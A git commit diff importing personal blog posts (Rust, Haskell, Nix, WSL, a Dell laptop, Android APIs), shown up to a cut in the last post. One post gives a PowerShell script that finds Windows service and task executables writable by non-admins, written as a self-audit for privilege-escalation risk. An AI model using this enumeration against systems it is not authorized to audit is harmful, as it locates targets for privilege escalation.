import old posts
This commit is contained in:
parent
8ae937faf6
commit
3e4932f921
42 changed files with 2817 additions and 0 deletions
3
content/posts/_index.md
Normal file
3
content/posts/_index.md
Normal file
|
|
@ -0,0 +1,3 @@
|
||||||
|
+++
|
||||||
|
transparent = true
|
||||||
|
+++
|
||||||
28
content/posts/about.md
Normal file
28
content/posts/about.md
Normal file
|
|
@ -0,0 +1,28 @@
|
||||||
|
+++
|
||||||
|
title = "About me"
|
||||||
|
date = "2019-11-10"
|
||||||
|
draft = false
|
||||||
|
path = "/about"
|
||||||
|
|
||||||
|
[extra]
|
||||||
|
isPage = true
|
||||||
|
+++
|
||||||
|
Hi!
|
||||||
|
|
||||||
|
I'm an undergraduate student in Computer Engineering at the University of
|
||||||
|
British Columbia.
|
||||||
|
|
||||||
|
I have done mechanical design for ThunderBots, a RoboCup Small Size League team
|
||||||
|
building soccer-playing robots. Prior to this, I was on a 4 person team
|
||||||
|
participating in Skills Canada Robotics, and in my last year of high school, we
|
||||||
|
had the opportunity to [go to Nationals in
|
||||||
|
Halifax](blog/i-competed-in-skills-canada-robotics), where we achieved first
|
||||||
|
place for Saskatchewan.
|
||||||
|
|
||||||
|
Other than robotics, I am most interested in Rust and embedded systems,
|
||||||
|
especially the security thereof.
|
||||||
|
|
||||||
|
To contact me, email `jade` at this domain (`LFCODE` dot ca).
|
||||||
|
|
||||||
|
Jade
|
||||||
|
she/they
|
||||||
|
|
@ -0,0 +1,64 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["PowerShell", "windows"]
|
||||||
|
date = 2019-07-06T07:46:02Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
isPage = false
|
||||||
|
path = "/blog/auditing-world-writable-high-privilege-executables"
|
||||||
|
tags = ["PowerShell", "windows"]
|
||||||
|
title = "Auditing world-writable high-privilege executables on Windows"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I was reading [Matt Nelson's post on a permissions issue causing privilege escalation](https://posts.specterops.io/cve-2019-13142-razer-surround-1-1-63-0-eop-f18c52b8be0c) and thought "I have too much software installed, I wonder if any of it is vulnerable". <!-- excerpt --> So on to PowerShell! I developed all of this by interactive exploration using `Get-Member`, `Format-List *`, and `Get-Command`.
|
||||||
|
|
||||||
|
At the end of this exploration, I did indeed find a vulnerable service, _however,_ it was because the application was installed in a world-writable parent directory due to my own carelessness (a situation I fixed). This finding leaves the open question of whether it is the job of the service's installer to set secure permissions on its install directory or just follow the permissions of the parent directory.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS> # First, let's define a function to find if a given path is interesting
|
||||||
|
PS> function Get-InterestingAccess($path) {
|
||||||
|
>> get-acl $path | %{$_.access} | ? {$_.filesystemrights.hasflag([System.Security.AccessControl.FileSystemRights]::Modify)} | ? {-not ($_.identityreference -in @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller'))}
|
||||||
|
>> }
|
||||||
|
PS> # stolen shamelessly from StackOverflow (it is ridiculous that you need P/Invoke for this)
|
||||||
|
PS> $src = @"
|
||||||
|
using System;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
public class ParseCmdline{
|
||||||
|
[DllImport("shell32.dll", SetLastError = true)]
|
||||||
|
static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs);
|
||||||
|
|
||||||
|
public static string[] CommandLineToArgs(string commandLine)
|
||||||
|
{
|
||||||
|
int argc;
|
||||||
|
var argv = CommandLineToArgvW(commandLine, out argc);
|
||||||
|
if (argv == IntPtr.Zero)
|
||||||
|
throw new System.ComponentModel.Win32Exception();
|
||||||
|
try
|
||||||
|
{
|
||||||
|
var args = new string[argc];
|
||||||
|
for (var i = 0; i < args.Length; i++)
|
||||||
|
{
|
||||||
|
var p = Marshal.ReadIntPtr(argv, i * IntPtr.Size);
|
||||||
|
args[i] = Marshal.PtrToStringUni(p);
|
||||||
|
}
|
||||||
|
|
||||||
|
return args;
|
||||||
|
}
|
||||||
|
finally
|
||||||
|
{
|
||||||
|
Marshal.FreeHGlobal(argv);
|
||||||
|
}
|
||||||
|
}}
|
||||||
|
"@
|
||||||
|
PS> add-type -TypeDefinition $src
|
||||||
|
PS> # let's look for services with vulnerabilities. First find all service executables:
|
||||||
|
PS> $targets = gcim win32_service | %{[ParseCmdline]::CommandLineToArgs($_.pathname)[0]}
|
||||||
|
PS> $targets | where { Get-InterestingAccess -path $_ }
|
||||||
|
# redacted
|
||||||
|
PS> # also try:
|
||||||
|
PS> $targets = Get-ScheduledTask | %{ [System.Environment]::ExpandEnvironmentVariables($_.actions.execute) } | ? {$_}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
@ -0,0 +1,14 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
date = 2018-01-24T23:25:59Z
|
||||||
|
description = ""
|
||||||
|
draft = true
|
||||||
|
path = "/blog/automated-red-hat-like-installation-on-hyper-v"
|
||||||
|
title = "Automated Red Hat-like installation on Hyper-V"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I have strange requirements sometimes. In this case, I had noticed that I can deploy machines with Kickstart, nearly zero-touch, but then as soon as they're installed, I have to go and log in locally to set a hostname, which is even more disruptive when they already put out a DNS registration with the wrong name.
|
||||||
|
|
||||||
|
Clearly this was a place for automation, so I set out to find a solution to read VM names from within the guest. In this vein, I found some information about reading these values from within Windows, and eventually found some technical documentation about `hypervkvpd`, which I used to develop a Python script. There were still significant issues integrating it into the kickstart to make an actual process but it was a step in the correct direction.
|
||||||
|
|
||||||
87
content/posts/custom-targets-in-rust.md
Normal file
87
content/posts/custom-targets-in-rust.md
Normal file
|
|
@ -0,0 +1,87 @@
|
||||||
|
+++
|
||||||
|
date = "2020-12-29"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/custom-targets-in-rust"
|
||||||
|
tags = ["rust", "embedded"]
|
||||||
|
title = "Custom targets in Rust"
|
||||||
|
+++
|
||||||
|
|
||||||
|
I'm going to try a new style of blog post for this one, more of a lab notebook
|
||||||
|
style. Expect normal posts for more interesting topics than fixing build
|
||||||
|
systems.
|
||||||
|
|
||||||
|
## ISSUE: workspaces interact very poorly with targets
|
||||||
|
|
||||||
|
### BUGS:
|
||||||
|
|
||||||
|
* https://github.com/rust-lang/cargo/issues/7004
|
||||||
|
|
||||||
|
You can't make Cargo use a separate target per workspace crate. Thus, workspace
|
||||||
|
wide builds like `cargo b --workspace` from the workspace root basically don't
|
||||||
|
work. Thus, put `default-members = []` in the virtual manifest to stop those
|
||||||
|
doing anything at all.
|
||||||
|
|
||||||
|
Workspace wide documentation also doesn't work, so use `-p PACKAGENAME` with
|
||||||
|
`cargo doc` which will document `PACKAGENAME` and all its dependencies,
|
||||||
|
including transitive dependencies. This is very likely to actually build if the
|
||||||
|
normal build works.
|
||||||
|
|
||||||
|
## ISSUE: `RUST_TARGET_PATH`
|
||||||
|
|
||||||
|
### BUGS
|
||||||
|
|
||||||
|
* https://stackoverflow.com/questions/48040146/error-loading-target-specification-could-not-find-specification-for-target
|
||||||
|
|
||||||
|
* https://github.com/japaric/xargo/issues/44
|
||||||
|
|
||||||
|
* https://github.com/rust-lang/cargo/issues/4905
|
||||||
|
|
||||||
|
This one was actually,,, attempted to be fixed, but the `xargo` PR got lost for
|
||||||
|
a year in 2018 and got abandoned.
|
||||||
|
|
||||||
|
Thus you should use `cargo -Z build-std` instead of any of `xargo` or
|
||||||
|
`cargo-xbuild`, per the instructions in the [cargo-xbuild
|
||||||
|
README](https://docs.rs/crate/cargo-xbuild/0.6.4).
|
||||||
|
|
||||||
|
In particular, to not use `xargo` and not have to use `RUST_TARGET_PATH`:
|
||||||
|
|
||||||
|
```text
|
||||||
|
cargo build -Z build-std=core,compiler_builtins -Z build-std-features=compiler-builtins-mem --release --target ../riscv64imac-mu-kern-elf.json
|
||||||
|
```
|
||||||
|
|
||||||
|
## ISSUE: documentation for target spec files
|
||||||
|
|
||||||
|
[This page wrongly suggests `xargo` which is outdated.](https://doc.rust-lang.org/stable/rustc/targets/custom.html)
|
||||||
|
|
||||||
|
Some of the options are documented on
|
||||||
|
[codegen-options](https://doc.rust-lang.org/stable/rustc/codegen-options/index.html)
|
||||||
|
but not really,
|
||||||
|
|
||||||
|
I just stole most of mine out of
|
||||||
|
[SunriseOS](https://github.com/sunriseos/SunriseOS/blob/master/i386-unknown-none.json).
|
||||||
|
|
||||||
|
There's some WEIRD caching going on with this, and you probably want to wipe
|
||||||
|
`target` for each build while messing with this file.
|
||||||
|
|
||||||
|
## ISSUE: how do you even get a target spec file?
|
||||||
|
|
||||||
|
```text
|
||||||
|
# Get a starting point for a target spec
|
||||||
|
rustc +nightly -Zunstable-options --print target-spec-json --target riscv64imac-unknown-none-elf > ../riscv64imac-unknown-mukern-elf.json
|
||||||
|
|
||||||
|
# Check if the target spec is round tripping properly
|
||||||
|
RUST_TARGET_PATH=$(realpath ..) rustc --target riscv64imac-unknown-mukern-elf -Z unstable-options --print target-spec-json
|
||||||
|
```
|
||||||
|
|
||||||
|
## ISSUE: debugging `cargo check` issues in rust-analyzer
|
||||||
|
|
||||||
|
Put this incantation in a shell startup file such that it ends up in your RA
|
||||||
|
process's environment (🙃). I wish it was configurable in VSCode somewhere.
|
||||||
|
|
||||||
|
```
|
||||||
|
export RA_LOG='rust_analyzer=info,salsa=error,flycheck=debug'
|
||||||
|
```
|
||||||
|
|
||||||
|
The RA logs have useful config information, the `salsa` logs are extremely
|
||||||
|
spammy, and `flycheck` is the `cargo check` module. [Its docs are
|
||||||
|
here](https://rust-analyzer.github.io/rust-analyzer/flycheck/index.html).
|
||||||
64
content/posts/debugging-template-haskell.md
Normal file
64
content/posts/debugging-template-haskell.md
Normal file
|
|
@ -0,0 +1,64 @@
|
||||||
|
+++
|
||||||
|
date = "2020-08-31"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/debugging-template-haskell"
|
||||||
|
tags = ["haskell"]
|
||||||
|
title = "Debugging Template Haskell"
|
||||||
|
+++
|
||||||
|
|
||||||
|
Template Haskell powers a lot of really neat functionality in Yesod and
|
||||||
|
friends, but sometimes it can be broken. I'm writing this post to collect all
|
||||||
|
the info learned about GHC and Cabal from an unpleasant debugging session in
|
||||||
|
one place.
|
||||||
|
|
||||||
|
I was tracking down a problem causing my [work project](https://github.com/Carnap/Carnap)
|
||||||
|
to not build on a newer GHC version
|
||||||
|
([spoiler: it was this `persistent` bug](https://github.com/yesodweb/persistent/issues/1047))
|
||||||
|
and hit a brick wall when this happened:
|
||||||
|
|
||||||
|
```
|
||||||
|
/home/lf/dev/Carnap/Carnap-Server/Model.hs:16:7: error:
|
||||||
|
• Not in scope: type constructor or class ‘CoInstructorId’
|
||||||
|
• In the untyped splice:
|
||||||
|
$(persistFileWith lowerCaseSettings "config/models")
|
||||||
|
|
|
||||||
|
16 | $(persistFileWith lowerCaseSettings "config/models")
|
||||||
|
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
```
|
||||||
|
|
||||||
|
The next step was to figure out what was generating these type constructors and
|
||||||
|
why it was stuffed. [The Internet](https://stackoverflow.com/questions/15851060/ghc-ddump-splices-option-template-haskell)
|
||||||
|
suggested that I should pass `-ddump-splices -ddump-to-file` to ghc. Cool! So I
|
||||||
|
did and it didn't make any visible files. Dammit.
|
||||||
|
|
||||||
|
Some more Googling led to the option `-dth-dec-file`, which I also applied to
|
||||||
|
no observable effect. At this point my emotions were best described as 🤡.
|
||||||
|
|
||||||
|
So I read the documentation and find that there are still no mentions of what
|
||||||
|
the file is called or where it goes. I compile the version that is known to
|
||||||
|
work with the `-dth-dec-file`, since allegedly that one produces
|
||||||
|
`Filename.th.hs` files, and this time try a little harder to find them, using
|
||||||
|
`find -name '*.th.hs*'`. As it turns out, those files end up in the
|
||||||
|
`dist-newstyle` directory if running in Cabal. Specifically here:
|
||||||
|
|
||||||
|
> `dist-newstyle/build/x86_64-linux/ghc-x.y.z/YourPackage-a.b.c/build/Filename.th.hs`
|
||||||
|
> `dist-newstyle/build/x86_64-linux/ghc-x.y.z/YourPackage-a.b.c/build/Filename.dump-splices`
|
||||||
|
|
||||||
|
Once I found the files, I could track them down on the broken version, except
|
||||||
|
there was a problem: `-dth-dec-file` appears to run at one of the last compile
|
||||||
|
phases, which the broken file was not passing. If you are debugging compile
|
||||||
|
problems in a file that doesn't itself compile, you should use
|
||||||
|
`-ddump-splices -ddump-to-file`.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
In summary:
|
||||||
|
|
||||||
|
* Use `-dth-dec-file` for a slightly shorter (11k lines vs 12k lines for
|
||||||
|
Carnap's models), and possibly more readable TH output, if the file
|
||||||
|
containing the splice builds.
|
||||||
|
* Use `-ddump-splices -ddump-to-file` if the file containing the splice doesn't
|
||||||
|
build.
|
||||||
|
* Outputs will be in `dist-newstyle/build/x86_64-linux/ghc-x.y.z/YourPackage-a.b.c/Filename.{th.hs,dump-splices}`
|
||||||
|
* GHC documentation on dump options is [here](https://downloads.haskell.org/~ghc/latest/docs/html/users_guide/debugging.html#dumping-output)
|
||||||
|
|
||||||
71
content/posts/dell-xps-15.md
Normal file
71
content/posts/dell-xps-15.md
Normal file
|
|
@ -0,0 +1,71 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["linux", "arch-linux", "hardware", "laptop", "dell-xps-15"]
|
||||||
|
date = 2018-03-18T07:12:05Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/dell-xps-15"
|
||||||
|
tags = ["linux", "arch-linux", "hardware", "laptop", "dell-xps-15"]
|
||||||
|
title = "Dell XPS 15: \"I can't understand why some people _still_ think ACPI is a good idea..\" -Linus Torvalds"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I got my new machine in the mail, an XPS 15 bought on one of the numerous sales which pretty much happen every couple of days, and while most of the hardware is amazing compared to my previous machine (a beat-up X220), there are some significant hardware issues that need to be worked around. Besides, of course, the fact that the keyboard and lack of trackpoint is objectively inferior to the previous machine. <!-- excerpt -->
|
||||||
|
|
||||||
|
The first thing that many people may do after booting up a new machine on any operating system is to make sure they got what they paid for, and check detected hardware. So, naturally, I run `lspci`... and it hangs. I could change virtual console, but it said something about a watchdog catching a stalled CPU core. Fun! Off to Google, which states that it's the NVidia driver, specifically related to Optimus (which, by the way, [this video](https://youtu.be/MShbP3OpASA?t=48m13s) remains an excellent description of). So I blacklist it, and lspci seems to work fine. Next, I install X and all the other applications I want to use, and being a sensible Arch user, I read the Arch wiki on the hardware, which states that the dedicated graphics card will use a lot of power if it isn't turned off.
|
||||||
|
|
||||||
|
So, I turn it off. For this, I use `acpi_call` with a `systemd-tmpfiles` rule to turn it off at boot. The setup is as follows:
|
||||||
|
|
||||||
|
```
|
||||||
|
~ » cat /etc/tmpfiles.d/acpi_call.conf
|
||||||
|
w /proc/acpi/call - - - - \\_SB.PCI0.PEG0.PEGP._OFF
|
||||||
|
~ » cat /etc/modules-load.d/acpi_call.conf
|
||||||
|
acpi_call
|
||||||
|
```
|
||||||
|
|
||||||
|
Next, I get to work doing some programming on it. It was a massive improvement on the previous hardware on account of having a 1080p screen instead of a 1366x768 device-usability-eliminator. However, my terminal-based vim sessions kept getting disturbed by messages such as the following:
|
||||||
|
|
||||||
|
```
|
||||||
|
kernel: pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Data Link Layer, id=00e0(Transmitter ID)
|
||||||
|
kernel: pcieport 0000:00:1c.0: device [8086:a110] error status/mask=00001000/00002000
|
||||||
|
```
|
||||||
|
|
||||||
|
After looking in the wiki again, I set `pci=nommconf` in the kernel options. At this point I was entirely unconvinced that the `acpi_rev_override=1` stuff was necessary since I got rid of any NVidia software that could possibly break my machine.
|
||||||
|
|
||||||
|
Satisfied with my handiwork, I put the machine into service, and took it to school. Naturally, one may want to put a machine into sleep mode if it is not in use. Unfortunately, doing so was causing it to lock up upon any attempt at waking it. Another strange behaviour that I had been starting to notice at this point was that Xorg could not be started more than once a boot due to the same hard lock issue.
|
||||||
|
|
||||||
|
As it turns out, this was again the same issue as the sleep, which is fixed by the `acpi_rev_override=1` in the kernel parameters. I had been dissuaded by the Arch developers disabling `CONFIG_ACPI_REV_OVERRIDE_POSSIBLE` at some point in the past, which was what was suggested by an outdated forum post (lesson learned: do more research on things which could easily change), but they reenabled it recently.
|
||||||
|
|
||||||
|
So, finally, the situation:
|
||||||
|
|
||||||
|
- Power management appears to work correctly
|
||||||
|
- Battery life is incredible (but could probably be hugely improved to "ridiculous")
|
||||||
|
- The touchpad is a touchpad, which means it sucks, although it is one of the better ones
|
||||||
|
- There is a significant and very annoying key-repeatt isssuee which happens on occasion, some users have reported it also occurs on Windows. It has happened at least 5 times while writing this post.
|
||||||
|
- I hadn't noticed this earlier, but the *keyboard has a tendency to scratch the screen* while the laptop is closed. Since this is a thoroughly modern machine, there isn't really space to just shove a microfiber cloth between the screen and keyboard like I had done with my X220 with missing rubber standoffs.
|
||||||
|
|
||||||
|
### Would I recommend buying one?
|
||||||
|
|
||||||
|
**Maybe**. For my use case, it made sense since I want to have a dedicated GPU which can be used in Windows for CAD work. The hardware with the exception of the keyboard and trackpad is very nice, especially for the price (a bit more than half what Apple charges for a similarly specced MacBook Pro 15"). If you don't need or want a dedicated GPU, ***buy another machine***. NVidia still has awful Linux problems.
|
||||||
|
|
||||||
|
Which machine? Probably a ThinkPad since they have very good Linux support right out of the box. That being said, I acknowledge that Dell has a group dedicated to Linux support on their hardware, and both companies have similar complete lacks of desire to lift a finger with regards to pressuring their fingerprint reader vendor (the same one for both companies!) to release the driver spec.
|
||||||
|
|
||||||
|
Since Linus Torvalds provides such excellent material to quote,
|
||||||
|
|
||||||
|
<pre><code>The thing is, you have two choices:
|
||||||
|
- define interfaces in hardware
|
||||||
|
- not doing so, and then trying to paper it over with idiotic tables.
|
||||||
|
|
||||||
|
Sadly, Intel decided that they should do the latter, and invented ACPI.
|
||||||
|
|
||||||
|
There are two kinds of interfaces: the simple ones, and the broken ones.
|
||||||
|
|
||||||
|
<...>
|
||||||
|
|
||||||
|
The broken ones are the ones where hardware people know what they want to
|
||||||
|
do, but they think the interface is sucky and complicated, so they make it
|
||||||
|
_doubly_ sucky by then saying "we'll describe it in the BIOS tables", so
|
||||||
|
that now there is another (incompetent) group that can _also_ screw things
|
||||||
|
up. Yeehaa!
|
||||||
|
</pre></code>
|
||||||
|
|
||||||
40
content/posts/developer-log-caldnd-and-hacking-on-android.md
Normal file
40
content/posts/developer-log-caldnd-and-hacking-on-android.md
Normal file
|
|
@ -0,0 +1,40 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
date = 2019-09-28T04:31:43Z
|
||||||
|
description = ""
|
||||||
|
draft = true
|
||||||
|
path = "/blog/developer-log-caldnd-and-hacking-on-android"
|
||||||
|
title = "Developer Log: CalDND and Hacking on Android"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
I have been developing a program called CalDND, which allows for better management of calendar-based automatic Do Not Disturb rules (internally called Zen rules). This post details stuff I learned along the way:
|
||||||
|
|
||||||
|
1. How GitHub code search works when you need to find stuff in obscure corners of the Android framework.
|
||||||
|
2. GitHub code search isn't ideal, so how to get yourself a copy of the Android source.
|
||||||
|
3. More about how the API actually works.
|
||||||
|
|
||||||
|
## GitHub Code Search
|
||||||
|
|
||||||
|
When trying to find uses of Android APIs but avoid their definitions, it's a pain: GitHub will give you 1000 copies of the Android sources of different ages, most of which are from custom ROMs. The most effective way I've tried to do this is by excluding the file names of the usages in the Android framework, for example, `META_DATA_CONFIGURATION_ACTIVITY -filename:ConditionProviderService.java`.
|
||||||
|
|
||||||
|
## Getting the sources effectively
|
||||||
|
|
||||||
|
I felt like it was more comfortable to work with a copy of the sources that I can do anything I want with, so the next task was to [download the Android sources](https://source.android.com/setup/build/downloading), so `repo init` then aggressively trim stuff that I don't think will have any answers using vim: `g/external/d`. Finally do a full `repo sync`. This won't work you're on very slow internet, as the sync will not finish in any timely manner (I left it overnight and it wasn't done by morning). It is advised to temporarily rent a fast virtual machine from Linode or another provider and play with the sources on there. I had the answers about the areas of the sources I was interested in within 2 hours, including the rental of the machine. I then just did a `repo sync frameworks/base` and `repo sync packages/apps/Settings` on my PC, which I can `ag` with reasonable performance.
|
||||||
|
|
||||||
|
## About the API
|
||||||
|
|
||||||
|
Note: this is referring to the deprecated API level 24 system. Why? My phone gets the API 29 update halfway through _next year_, and I want to write my app now. I believe a fair amount of it is still true on the new system.
|
||||||
|
|
||||||
|
I believe that the API works as follows: you get the permissions to work with the notifications/Do-Not-Disturb system, which allows you to bind a service and also lists your provider in the "Add Automatic Rule" list. [Docs](https://developer.android.com/reference/android/service/notification/ConditionProviderService.html).
|
||||||
|
|
||||||
|
If you specify a configuration activity, when your item is selected, it will pop up that activity, but will not give it any extras in the intent. What you're then expected to do is create an `AutomaticZenRule`, then put it through `[NotificationManager.addAutomaticZenRule()](https://developer.android.com/reference/android/app/NotificationManager.html#addAutomaticZenRule(android.app.AutomaticZenRule)`, store whatever details you need to, and `.finish()` your activity.
|
||||||
|
|
||||||
|
Future attempts to click on the automatic rule in the settings page will result in your activity being started with an extra on it, `[EXTRA_RULE_ID](https://developer.android.com/reference/android/service/notification/ConditionProviderService.html#EXTRA_RULE_ID)`, which you can then use to retrieve the settings for that rule from your storage.
|
||||||
|
|
||||||
|
### The weird parts about the API
|
||||||
|
|
||||||
|
There is one really confusing thing about this API, besides the fact that nobody uses it, which is that the schedule is stored as a **URI**. What?! To further confuse, the format of the URI in question is not thoroughly documented in the official documentation, which is a large part of why I had to read Android sources to begin with (as turns out, it's essentially totally free-form, but it took some significant source-reading to understand that).
|
||||||
|
|
||||||
|
Examples of how the system rules parse/use these URIs are in `frameworks/base/core/java/android/service/notification/ZenModeConfig.java`. The class that you're supposed to use to make these is the [Condition](https://developer.android.com/reference/android/service/notification/Condition.html). They are formatted like so: `condition://AUTHORITY/WHATEVER_YOU_WANT`, where the authority is your package name, and the path component is whatever you want to use to identify this rule. It is convenient to encode the entire data of the rule inside the rule URI if possible since you can avoid needing to write code to handle persistent storage if you do so.
|
||||||
|
|
||||||
88
content/posts/development-in-wsl.md
Normal file
88
content/posts/development-in-wsl.md
Normal file
|
|
@ -0,0 +1,88 @@
|
||||||
|
+++
|
||||||
|
date = "2020-07-19"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/development-in-wsl"
|
||||||
|
tags = []
|
||||||
|
title = "My software development setup in WSL 2"
|
||||||
|
+++
|
||||||
|
|
||||||
|
I'm writing this post because I work every day in WSL 2 on my main computer and
|
||||||
|
I feel it might be useful to those trying to get a productive setup running.
|
||||||
|
|
||||||
|
I use Arch Linux inside WSL, with the [ArchWSL
|
||||||
|
project](https://github.com/yuk7/ArchWSL). Arch is used since it's what I've
|
||||||
|
installed on my other computers, and is compelling for the same reasons: up to
|
||||||
|
date packages, reliable, and is easy to package things for.
|
||||||
|
|
||||||
|
## Shell/completion performance
|
||||||
|
|
||||||
|
Since I use a zsh shell with syntax highlighting and relatively slow command
|
||||||
|
completion, I found that the stock setup of putting the ~30 directories in my
|
||||||
|
Windows PATH into the Linux one was causing massive shell performance issues.
|
||||||
|
This is resolved with some `wsl.conf` options on the Linux side:
|
||||||
|
|
||||||
|
`/etc/wsl.conf`:
|
||||||
|
|
||||||
|
```
|
||||||
|
[interop]
|
||||||
|
enabled = true
|
||||||
|
appendWindowsPath = false
|
||||||
|
|
||||||
|
# It was also not picking up my DNS settings so have it stop trying to do that
|
||||||
|
[network]
|
||||||
|
generateResolvConf = false
|
||||||
|
```
|
||||||
|
|
||||||
|
## Terminal
|
||||||
|
|
||||||
|
Before switching to WSL for essentially all of my needs (except flashing my QMK
|
||||||
|
peripherals), I used msys2, which uses mintty as a terminal. WSL with mintty is
|
||||||
|
done through [wsltty](https://github.com/mintty/wsltty) these days, and that is
|
||||||
|
what I use. It does not require significant configuration.
|
||||||
|
|
||||||
|
The new [Windows Terminal](https://github.com/microsoft/terminal) is likely
|
||||||
|
viable these days (and possibly faster in terms of rendering performance), but
|
||||||
|
I haven't investigated it.
|
||||||
|
|
||||||
|
## Daemons
|
||||||
|
|
||||||
|
I use nix for managing Haskell dependencies for a work project, and I sometimes
|
||||||
|
need to use Docker for development. Neither WSL nor WSL 2 natively support
|
||||||
|
running systemd as an init system. With WSL 2, process ID namespaces can be
|
||||||
|
used to make a namespace where systemd is PID 1 in which you can just run it. I
|
||||||
|
use a tool called [genie](https://github.com/arkane-systems/genie) that manages
|
||||||
|
this automatically.
|
||||||
|
|
||||||
|
## Clipboard integration
|
||||||
|
|
||||||
|
Download [`win32yank`](https://github.com/equalsraf/win32yank), make this file
|
||||||
|
and `chmod +x` it and neovim will pick it up as the clipboard provider:
|
||||||
|
|
||||||
|
`/usr/local/bin/win32yank.exe`:
|
||||||
|
|
||||||
|
```
|
||||||
|
#!/bin/sh
|
||||||
|
|
||||||
|
/mnt/c/Progs/win32yank.exe "$@"
|
||||||
|
```
|
||||||
|
|
||||||
|
This hack is required because of the PATH integration being disabled. I believe
|
||||||
|
you could also copy the executable into a bin folder (don't change the
|
||||||
|
extension) and it would work without the intermediate script.
|
||||||
|
|
||||||
|
## Memory
|
||||||
|
|
||||||
|
I limit the memory available to my WSL lower than the default 80% of my RAM
|
||||||
|
because I would rather stuff get killed on the Linux side or the Linux kernel
|
||||||
|
drop some of its cache rather than making Windows swap a whole bunch. Further,
|
||||||
|
I sometimes run `sudo sysctl vm.drop_caches=2` to drop Linux caches when
|
||||||
|
`vmmem` is causing memory pressure to the rest of my system.
|
||||||
|
|
||||||
|
`%USERPROFILE%\.wslconfig`:
|
||||||
|
|
||||||
|
```
|
||||||
|
[wsl2]
|
||||||
|
memory=20GB
|
||||||
|
swap=0
|
||||||
|
```
|
||||||
|
|
||||||
332
content/posts/finding-functions-in-nixpkgs.md
Normal file
332
content/posts/finding-functions-in-nixpkgs.md
Normal file
|
|
@ -0,0 +1,332 @@
|
||||||
|
+++
|
||||||
|
date = "2021-02-19"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/finding-functions-in-nixpkgs"
|
||||||
|
tags = ["nix"]
|
||||||
|
title = "Finding functions in nixpkgs"
|
||||||
|
+++
|
||||||
|
|
||||||
|
It is a poorly guarded secret that the most effective way to get documentation
|
||||||
|
on nixpkgs or nix functions is to read the source code. The hard part of that
|
||||||
|
is *finding* the right source code. I'll document a few static and dynamic
|
||||||
|
analysis strategies to find the documentation or definition of things in
|
||||||
|
nixpkgs going from trivial to some effort.
|
||||||
|
|
||||||
|
## Simple
|
||||||
|
|
||||||
|
These work on functions that have no wrappers around them, which account for
|
||||||
|
most library functions in nixpkgs.
|
||||||
|
|
||||||
|
### Static
|
||||||
|
|
||||||
|
Static analysis is, in my view, slightly slower, since you can't be sure you're
|
||||||
|
getting the function you're seeing in the interactive environment in `nix repl`
|
||||||
|
or elsewhere.
|
||||||
|
|
||||||
|
There are two tools for this that are capable of parsing nix source, `nix-doc`
|
||||||
|
(my project) and `manix`, both of which are in nixpkgs.
|
||||||
|
|
||||||
|
Note that `nix-doc` will only work from within a nixpkgs checkout or if you
|
||||||
|
pass it a second parameter of where your nixpkgs is. This is mostly because
|
||||||
|
`nix-doc`'s main focus has switched to being mainly on providing a function in
|
||||||
|
the REPL.
|
||||||
|
|
||||||
|
There is also a [fork of `rnix-lsp`](https://github.com/elkowar/rnix-lsp) which
|
||||||
|
provides `manix` based documentation from within editors.
|
||||||
|
|
||||||
|
```
|
||||||
|
# your nixpkgs checkout
|
||||||
|
$ cd ~/dev/nixpkgs; nix-shell -p manix nix-doc
|
||||||
|
[nix-shell:~/dev/nixpkgs]$ manix foldl
|
||||||
|
```
|
||||||
|
<details>
|
||||||
|
<summary>
|
||||||
|
<code class="language-text">manix</code> output
|
||||||
|
</summary>
|
||||||
|
|
||||||
|
<pre class="language-text"><code>
|
||||||
|
<b>Here's what I found in nixpkgs:</b> <font color="#D0CFCC">lib.lists.foldl'</font>
|
||||||
|
<font color="#D0CFCC">lib.lists.foldl</font> <font color="#D0CFCC">lib.foldl</font>
|
||||||
|
<font color="#D0CFCC">lib.foldl'</font> <font color="#D0CFCC">haskellPackages.foldl-statistics</font>
|
||||||
|
<font color="#D0CFCC">haskellPackages.foldl-transduce-attoparsec</font>
|
||||||
|
<font color="#D0CFCC">haskellPackages.foldl-incremental</font> <font color="#D0CFCC">haskellPackages.foldl-exceptions</font>
|
||||||
|
<font color="#D0CFCC">haskellPackages.foldl</font> <font color="#D0CFCC">haskellPackages.foldl-transduce</font>
|
||||||
|
|
||||||
|
<font color="#D0CFCC">Nixpkgs Comments</font>
|
||||||
|
<font color="#26A269">────────────────────</font>
|
||||||
|
# <font color="#12488B"><b>foldl</b></font> (<font color="#D0CFCC">lib/lists.nix</font>)
|
||||||
|
“left fold”, like `foldr`, but from the left:
|
||||||
|
`foldl op nul [x_1 x_2 ... x_n] == op (... (op (op nul x_1) x_2) ... x_n)`.
|
||||||
|
|
||||||
|
Type: foldl :: (b -> a -> b) -> b -> [a] -> b
|
||||||
|
|
||||||
|
Example:
|
||||||
|
lconcat = foldl (a: b: a + b) "z"
|
||||||
|
lconcat [ "a" "b" "c" ]
|
||||||
|
=> "zabc"
|
||||||
|
# different types
|
||||||
|
lstrange = foldl (str: int: str + toString (int + 1)) "a"
|
||||||
|
lstrange [ 1 2 3 4 ]
|
||||||
|
=> "a2345"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
